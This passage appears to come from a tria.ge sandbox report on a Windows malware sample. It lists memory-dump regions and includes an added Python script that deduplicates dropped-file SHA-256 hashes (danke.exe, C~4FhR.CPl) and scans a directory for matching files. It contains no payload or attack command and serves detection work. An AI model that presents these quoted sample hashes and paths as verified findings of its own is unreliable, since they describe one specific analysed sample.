                1.1MB

              • memory/5088-244-0x0000000002D20000-0x0000000002E1E000-memory.dmp

                Filesize

                1016KB

              • memory/5088-246-0x0000000002D20000-0x0000000002E1E000-memory.dmp

                Filesize

                1016KB

              • memory/5088-247-0x0000000002D20000-0x0000000002E1E000-memory.dmp

                Filesize

                1016KB
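The dropped-files listing above repeats entries (the report records every write of a path) and shows the same payload under more than one name: danke.exe and b1952586.exe carry the same SHA-256, as do C~4FhR.CPl and c~4fhr.cpl, which on NTFS are one file. The Python below is an added example and not part of the tria.ge report: it parses this listing format into one record per distinct SHA-256 and sweeps a directory for files whose content matches. The hashes and paths embedded in SAMPLE_LISTING are copied from the page (MD5/SHA1/SHA512 rows and blank lines are dropped to keep it short); the function names, the temp-dir sweep and the planted stand-in file are illustrative assumptions.

```python
"""Parse a tria.ge dropped-files listing into a deduplicated SHA-256 IOC set
and sweep a directory for files matching it. Added example, not part of the
report; hashes/paths in SAMPLE_LISTING come from the listing above, everything
else (function names, temp-dir sweep, planted stand-in file) is an assumption."""
import hashlib
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

# Constructed sample: a path the report lists twice, the same content under a
# second name, one .cpl path in two letter cases, and a memory region (no hash).
SAMPLE_LISTING = r"""
• C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
Filesize
228KB
SHA256
d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
• C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
Filesize
228KB
SHA256
d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
• C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe
Filesize
228KB
SHA256
d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
• C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl
Filesize
1.3MB
SHA256
e1ab9f9baaf156a0f791c76e393621bb3af38d2483aadfab91345d4c0d4fa498
• C:\Users\Admin\AppData\Local\Temp\c~4fhr.cpl
Filesize
1.3MB
SHA256
e1ab9f9baaf156a0f791c76e393621bb3af38d2483aadfab91345d4c0d4fa498
• memory/3136-175-0x0000000002970000-0x0000000002986000-memory.dmp
Filesize
88KB
"""


@dataclass
class DroppedFile:
    sha256: str
    size: str
    paths: set = field(default_factory=set)


def parse_listing(text: str) -> dict:
    """One record per distinct SHA-256: repeated writes of a path and the same
    payload under another name both collapse onto the hash. Paths are
    case-folded because NTFS lookups are case-insensitive."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    entries = []  # (path, {label: value})
    i = 0
    while i < len(lines):
        if lines[i].startswith("•"):
            entries.append((lines[i].lstrip("• "), {}))
            i += 1
        elif entries and i + 1 < len(lines):
            entries[-1][1][lines[i].lower()] = lines[i + 1]  # label row, value row
            i += 2
        else:
            raise ValueError(f"malformed listing near {lines[i]!r}")
    by_hash = {}
    for path, rows in entries:
        digest = rows.get("sha256", "").lower()
        if len(digest) == 64:  # memory regions carry only a Filesize row; skip them
            rec = by_hash.setdefault(digest, DroppedFile(digest, rows.get("filesize", "")))
            rec.paths.add(path.lower())
    return by_hash


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root: Path, iocs: dict) -> list:
    """Hash every regular file under root; return (path, record) for each hit.
    Matching on content rather than name finds the payload under any filename."""
    hits = []
    for p in root.rglob("*"):
        if p.is_file():
            digest = sha256_of(p)
            if digest in iocs:
                hits.append((p, iocs[digest]))
    return hits


def self_check() -> tuple:
    """Plant a stand-in file and register its hash as a synthetic IOC: expect one
    hit against the synthetic set and none against the report's real hashes."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "benign.txt").write_bytes(b"nothing to see here")
        planted = root / "3ec1f323b5" / "danke.exe"
        planted.parent.mkdir()
        planted.write_bytes(b"constructed stand-in, not the real payload")
        synthetic = {sha256_of(planted): DroppedFile(sha256_of(planted), "", {"planted"})}
        return len(sweep(root, synthetic)), len(sweep(root, parse_listing(SAMPLE_LISTING)))
```

`parse_listing(SAMPLE_LISTING)` yields two records for the five file entries, and `self_check()` returns `(1, 0)`: the planted stand-in is found through its own hash while nothing on the scratch disk matches the real sample hashes. To use it on a full report, paste the whole dropped-files section into `parse_listing` and point `sweep` at a mounted image or user profile; content matching is what matters here, since the listing shows the same payload written under two different names.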
